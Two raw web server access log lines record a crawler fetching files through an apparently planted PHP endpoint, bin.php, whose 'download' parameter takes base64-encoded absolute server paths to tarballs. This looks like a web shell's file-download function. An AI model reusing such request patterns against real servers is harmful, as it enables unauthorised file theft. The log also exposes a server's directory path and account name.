74.7.227.14 - - [24/Dec/2025:07:12:24 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluLy5zcGFtYXNzYXNzaW5ib3hlbmFibGUuc3BhbWFzc2Fzc2luYm94ZW5hYmxlLnRhci5neg== HTTP/1.1" 200 115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:24 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL0FWQUlMQUJMRV9BUFBMSUNBVElPTlNfQ0FDSEVfZW5fanVwaXRlci50YXIuZ3o= HTTP/1.1" 200 7263 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
